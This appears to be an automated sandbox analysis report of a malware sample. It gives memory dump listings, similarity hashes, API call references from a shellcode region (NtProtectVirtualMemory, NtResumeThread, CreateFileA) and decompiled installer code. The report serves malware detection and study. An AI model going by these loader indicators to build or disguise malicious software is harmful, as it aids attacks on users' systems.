C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 004021BD

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne
API String ID: 542301482-282784380
Opcode ID: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
Opcode Fuzzy Hash: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 02B69DC3 Relevance: 3.0, Strings: 2, Instructions: 485COMMON

Download Yara Rule

Strings

c~M], xrefs: 02B6A15A
I(l, xrefs: 02B6A101

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: I(l$c~M]
API String ID: 0-1567962784
Opcode ID: a43f7bcde103fb0e63b88409cb3d5e4fde7659e9fb405aff49782e22973e56df
Instruction ID: 0eaf31ac208039d0c7d2100604a49c21e5a6d512574535e614dedea3a499ebe4
Opcode Fuzzy Hash: a43f7bcde103fb0e63b88409cb3d5e4fde7659e9fb405aff49782e22973e56df
Instruction Fuzzy Hash: 2A0238756003458FDF349E68C9E83EE37A2EF563A0F94817ECC8A8B655D3344986CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02B815C3 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

2,:, xrefs: 02B815D6

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 2,:
API String ID: 0-1503982528
Opcode ID: f50061817eae5e82c333cd147ec149c023c1fd5110c03fc24afc4c882f6059f6
Instruction ID: 0d19b99fefdfa599c78d5a978a23d0966fffa1305260c394c0fc6b6026818fad
Opcode Fuzzy Hash: f50061817eae5e82c333cd147ec149c023c1fd5110c03fc24afc4c882f6059f6
Instruction Fuzzy Hash: 80B129B160034A9FDF34AE689DB47EB3793AF567A0F95412EDC8E9B640D3314986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02B8002E Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,8F5BB8AA,-8EE2104D,-01FAE51F,8E641DED,7F8A0721,06DB9A82,02B7FE82,-523F4620,00000000), ref: 02B8019A

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 720e27867db72e0b62c8e54143d858fbb978d8682966d48f3ed024a4c50aa92f
Instruction ID: dfdb2371c21d80d789676bc74ed9b8efd897f73777c66121800a13f2ab68e512
Opcode Fuzzy Hash: 720e27867db72e0b62c8e54143d858fbb978d8682966d48f3ed024a4c50aa92f
Instruction Fuzzy Hash: 8121577164434A8FDB74AE7889A17EBB7B7AF81390F82452DCCCA87144D3719485CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02B84AFC Relevance: 1.5, APIs: 1, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,02B8544C,D5DE3B79,00000000), ref: 02B84CCC

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8026799ff50e9a01677a9f9b5bd0076fedf30ef839978f94eb4646863113a253
Instruction ID: ac1eb273573ab15f6783c1600eb1dae59eacfccdfb6cb6c18529dc36f2f07788
Opcode Fuzzy Hash: 8026799ff50e9a01677a9f9b5bd0076fedf30ef839978f94eb4646863113a253
Instruction Fuzzy Hash: FB016231604247CFCB28EE748A947EA77B5AF88344F1146A5CE4FCB614D7749941CF20

Uniqueness

Uniqueness Score: -1.00%

Function 02B839D6 Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-D34ECDF4,?,?,?,02B82E31,-2C6722CC), ref: 02B83ABB

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6f94b9e1ed2ff981347080adc9b0516cbaaecd4f72faff05709ec7ab48df93f6
Instruction ID: b955de39a438554adb8df6e08f6f3c153611a7cccbb2df2d9d5645cbdda30fb4
Opcode Fuzzy Hash: 6f94b9e1ed2ff981347080adc9b0516cbaaecd4f72faff05709ec7ab48df93f6
Instruction Fuzzy Hash: B501B175A04295DBCF38CE148948BFA36A5AFD8714F46816AEC1D3B308D6309E01C794

Uniqueness

Uniqueness Score: -1.00%

Function 02B66F66 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89d4967f5d7b31e3198f13acd41cdcfa0907fe60045fbc11e2048e3baf40376
Instruction ID: 6f4581c73a62e1750108290ef3e7954fc947636da8925787dcbcc4d94e58fc86
Opcode Fuzzy Hash: c89d4967f5d7b31e3198f13acd41cdcfa0907fe60045fbc11e2048e3baf40376
Instruction Fuzzy Hash: AFF19B72A003459FDF349E6489A47EF77A3EF95790F96842EDC8D9B604D3308986CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B65E4D Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c68953597880da94e1a8115976f2593535f7faab56b2d2395f0023abb124685
Instruction ID: 5f364868699e44f91f6f40296180451c70172a61a9610d914455117ccd593c43
Opcode Fuzzy Hash: 0c68953597880da94e1a8115976f2593535f7faab56b2d2395f0023abb124685
Instruction Fuzzy Hash: 2ED12675A003599FDF34AE788CA87EF37A2AF967A0F95452DDC8E97644D3304981CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02B657B1 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a962e84d7e709597c39d1d3dc58c519308a3a8c34897aec37b73cfd48a6dbf93
Instruction ID: bea204f22444d2766aafa8f22c1c9589a2f9b8447ce0076e9971bd3cfc9c7b71
Opcode Fuzzy Hash: a962e84d7e709597c39d1d3dc58c519308a3a8c34897aec37b73cfd48a6dbf93
Instruction Fuzzy Hash: 1FB14671A0434A9FDF34AE788DA43EF37A2AF56760F95427ECC8D9B645C33149858B02

Uniqueness

Uniqueness Score: -1.00%

Function 02B80EBA Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80df45ee59084c07a0442dd54419df5689e8ac4211a0492da0f4e9c082a2d701
Instruction ID: 124e96576b218b162d80016c1688d88a55305113219185a7162dbb742c5dcca0
Opcode Fuzzy Hash: 80df45ee59084c07a0442dd54419df5689e8ac4211a0492da0f4e9c082a2d701
Instruction Fuzzy Hash: D25125B16003059FEF346E688DA47EF3693AF567A0F95413ACC8D97644D37089868B02

Uniqueness

Uniqueness Score: -1.00%

Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D3E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x42d230 = _t37;
					if(_t118 == 0x110) {
						 *0x434ee8 = _t128;
						 *0x42d244 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b210 = _t94;
						E00404217(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x433ec8);
						 *0x433eac = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x42d230 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x434f20;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404263(0x40b);
						while(1) {
							_t39 =  *0x42d230;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x434f24;
							if(_t41 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433eac - _t136;
							if( *0x433eac != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E004062A4(_t119, _t128, _t133, 0x444000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404217(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x434f8c - _t136;
							_v32 = _t51;
							if( *0x434f8c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404239(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x42b210, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d244);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x42b210);
							}
							E0040424C();
							E00406282(0x42d248, E00403D1F());
							E004062A4(0x42d248, _t128, _t133,  &(0x42d248[lstrlenW(0x42d248)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x42d248); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433eb8); // executed
									 *0x42c220 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x434ee0,  *_t133 +  *0x433ec0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x433eb8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404217(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x433eb8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433eac - _t136;
									if( *0x433eac != _t136) {
										goto L61;
									}
									ShowWindow( *0x433eb8, 8); // executed
									E00404263(0x405);
									goto L58;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L61;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x433eb8);
						 *0x434ee8 = _t136;
						EndDialog(_t128,  *0x42ba18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x433eb8, 0x40f, 0, 1);
						__eflags =  *0x433eac;
						return 0 |  *0x433eac == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x42d228, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42d228,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040427E(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x433eb8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x434f8c - _t136;
										if( *0x434f8c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x42ba18 = 1;
											L21:
											_push(0x78);
											L22:
											E004041F0();
											goto L26;
										}
										E0040140B(_t130);
										 *0x42ba18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x433eb8);
						 *0x433eb8 = _a12;
						L58:
						_t144 =  *0x42f248 - _t136; // 0x1
						if(_t144 == 0 &&  *0x433eb8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x42f248 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d47
0x00403d50
0x00403e91
0x00403e95
0x00403e99
0x00403e9b
0x00403ea0
0x00403eab
0x00403eb6
0x00403ebb
0x00403ebd
0x00403ebf
0x00403ec2
0x00403ec7
0x00403ed5
0x00403ee2
0x00403ee9
0x00403ee9
0x00403eea
0x00403eea
0x00403eef
0x00403ef5
0x00403efc
0x00403f02
0x00403f04
0x00403f44
0x00403f49
0x00403f4e
0x00403f4e
0x00403f53
0x00403f5c
0x00403f5e
0x00403f63
0x00403f69
0x00403f6d
0x00403f6d
0x00403f72
0x00403f78
0x00000000
0x00000000
0x00403f83
0x00403f89
0x00000000
0x00000000
0x00403f92
0x00403f9a
0x00403f9f
0x00403fa2
0x00403fa8
0x00403fad
0x00403fb0
0x00403fb6
0x00403fbb
0x00403fbe
0x00403fc4
0x00403fcc
0x00403fd2
0x00403fd8
0x00403fdc
0x00403fe3
0x00403fe3
0x00403fe3
0x00403fed
0x00403fff
0x0040400b
0x00404010
0x0040401a
0x00404020
0x00404022
0x00404027
0x00404024
0x00404024
0x00404024
0x00404037
0x0040404f
0x00404051
0x00404057
0x0040406c
0x00404059
0x00404062
0x00404064
0x00404064
0x00404072
0x00404083
0x00404099
0x004040a0
0x004040a6
0x004040aa
0x004040af
0x004040b1
0x00000000
0x004040b7
0x004040b7
0x004040b9
0x00000000
0x00000000
0x004040bf
0x004040c3
0x004040e8
0x004040ee
0x004040f4
0x004040f6
0x00000000
0x00000000
0x0040411c
0x00404122
0x00404124
0x00404129
0x00000000
0x00000000
0x0040412f
0x00404132
0x00404135
0x0040414c
0x00404158
0x00404171
0x00404177
0x0040417b
0x00404180
0x00404186
0x00000000
0x00000000
0x00404190
0x0040419b
0x00000000
0x0040419b
0x004040c5
0x004040cb
0x00000000
0x00000000
0x004040d1
0x004040d7
0x00000000
0x00000000
0x00000000
0x004040dd
0x004040b1
0x004041a8
0x004041b4
0x004041bb
0x00000000
0x00403f06
0x00403f06
0x00403f09
0x00403f3c
0x00403f3c
0x00403f3e
0x00000000
0x00000000
0x00000000
0x00403f3e
0x00403f0b
0x00403f0f
0x00403f14
0x00403f16
0x00000000
0x00000000
0x00403f26
0x00403f2e
0x00000000
0x00403f34
0x00403d62
0x00403d62
0x00403d66
0x00403d6b
0x00403d7a
0x00403d7a
0x00403d83
0x00403d8c
0x00403d97
0x00403d97
0x00403da3
0x00403dbf
0x00403dc2
0x00403dd5
0x00403ddb
0x00403e7e
0x00000000
0x00403e87
0x00403de1
0x00403dee
0x00403df0
0x00403df2
0x00403e11
0x00403e11
0x00403e14
0x00403e19
0x00403e1c
0x00403e2c
0x00403e2d
0x00403e2f
0x00403e65
0x00403e78
0x00000000
0x00403e78
0x00403e31
0x00403e37
0x00403e50
0x00403e55
0x00403e57
0x00000000
0x00000000
0x00403e59
0x00403e45
0x00403e45
0x00403e47
0x00403e47
0x00000000
0x00403e47
0x00403e3a
0x00403e3f
0x00000000
0x00403e3f
0x00403e1e
0x00403e24
0x00000000
0x00000000
0x00403e26
0x00000000
0x00403e26
0x00403e16
0x00000000
0x00403e16
0x00403dfc
0x00403e03
0x00403e09
0x00403e0b
0x00000000
0x00000000
0x00000000
0x00403e0b
0x00403dc7
0x00000000
0x00403da5
0x00403dab
0x00403db5
0x004041c1
0x004041c1
0x004041c7
0x004041d4
0x004041da
0x004041da
0x004041e4
0x00000000
0x004041e4
0x00403da3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
ShowWindow.USER32(?), ref: 00403D97
DestroyWindow.USER32 ref: 00403DAB
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
GetDlgItem.USER32(?,?), ref: 00403DE8
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
IsWindowEnabled.USER32(00000000), ref: 00403E03
GetDlgItem.USER32(?,00000001), ref: 00403EB1
GetDlgItem.USER32(?,00000002), ref: 00403EBB
SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
GetDlgItem.USER32(?,00000003), ref: 00403FCC
ShowWindow.USER32(00000000,?), ref: 00403FED
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
EnableWindow.USER32(?,?), ref: 0040401A
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
EnableMenuItem.USER32(00000000), ref: 00404037
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
SetWindowTextW.USER32(?,0042D248), ref: 004040A0
ShowWindow.USER32(?,0000000A), ref: 004041D4

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403990 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403990(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434ef4;
				_t22 = E0040665C(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d248;
					L"1033" = 0x30;
					 *0x441002 = 0x78;
					 *0x441004 = 0;
					E00406150(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d248, 0);
					__eflags =  *0x42d248;
					if(__eflags == 0) {
						E00406150(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x42d248, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004061C9(L"1033", _t73 & 0x0000ffff);
				}
				E00403C66(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry";
				 *0x434f80 =  *0x434efc & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405C5B(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry") != 0) {
					L16:
					if(E00405C5B(_t98, _t86) == 0) {
						E004062A4(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x434ee0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ec8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C66(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E004053B9(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433eac;
								if( *0x433eac == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d228, 5); // executed
							_t39 = E004065EC("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065EC("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433e80);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433e80);
								 *0x433ea4 = _t87;
								RegisterClassW(0x433e80);
							}
							_t44 = DialogBoxParamW( *0x434ee0,  *0x433ec0 + 0x00000069 & 0x0000ffff, 0, E00403D3E, 0); // executed
							E004038E0(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434ee0;
						 *0x433e84 = E00401000;
						 *0x433e90 =  *0x434ee0;
						 *0x433e94 = _t30;
						 *0x433ea4 = 0x40a380;
						if(RegisterClassW(0x433e80) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d228 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434ee0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432e80;
					E00406150(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432e80, 0);
					_t63 =  *0x432e80; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432e82;
						 *((short*)(E00405B80(0x432e82, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406282(_t86, E00405B53(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B9F(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
